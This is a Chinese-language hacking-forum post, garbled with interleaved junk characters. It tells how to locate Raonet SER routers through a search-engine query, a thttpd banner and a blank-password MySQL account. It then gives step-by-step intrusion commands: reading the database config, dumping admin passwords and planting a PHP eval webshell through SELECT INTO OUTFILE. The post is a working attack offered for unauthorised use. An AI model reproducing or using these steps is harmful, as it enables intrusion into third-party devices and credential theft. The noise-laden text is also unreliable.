寻找存在漏洞的路由器方法:
# N7 C4 q# x% `) ^0 o
! s) Q& x: b, t R$ Q2 }1:google搜索'Raonet Subscriber Ethernet Router'' c/ ] W7 h' [
6 g y' R6 \ v2 v: r2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 P7 K: a5 V5 {1 d$ x3 D5 T7 G
& a+ ]) ] q- t$ I6 A$ F' w
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
; l- l8 R7 S1 J; j+ m2 w1 {0 q8 u' C3 X, m3 K
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......- q& Z i7 }( Y* X3 D: n/ z6 y
9 _7 s6 T3 ]& l1 W: g1 V ) e4 F K. c4 V% H/ n
9 X! ~% e& ~- v/ z2 i7 \+ ~3 \4 g
入侵步骤:
- E! ]6 e0 t1 O$ M/ u2 @( V* O
" ~+ D# A: [) d1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
6 j* e" g3 |* S6 L+ u
8 i# F8 ~6 u$ L& D2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc6 o3 K5 j/ a! F2 Z" X
3:得到密码后连接,查看GUI管理密码:& J9 J5 C; l4 B
use ser_500
9 ~ o1 a# o6 _# G6 r' P8 y9 bselect id,passwd from user;, H& D8 E* c$ Z- @" }$ |- Z; x
4:通过数据库写入webshell,执行命令:
( K1 S0 o1 X$ h+ @$ \" |5 z5 Huse mysql;
: z% s& \- B+ W9 `) }" G% A4 Mcreate table ok(cmd TEXT);
+ S/ V* G0 y8 w8 P6 {% J7 Linsert into ok values("<?php @eval($_POST[cmd])?>");
; K/ M% y/ g) f% M/ S6 eselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";/ s) U5 {) M' J1 g- U2 x1 J
drop table ok;
" O, \$ t( t: K7 Q* D5 ^9 t$ T6 U& N4 O* Q, R
5:连接后门shell.php 4 a9 {6 X7 B4 K2 q" A, i. B7 m( Q; M
2 L: q/ b8 |# h( }, X* R
6. 搞定!
& k: x, y f9 _% y `3 G
4 K/ I& A: g7 k1 k+ I5 B: j |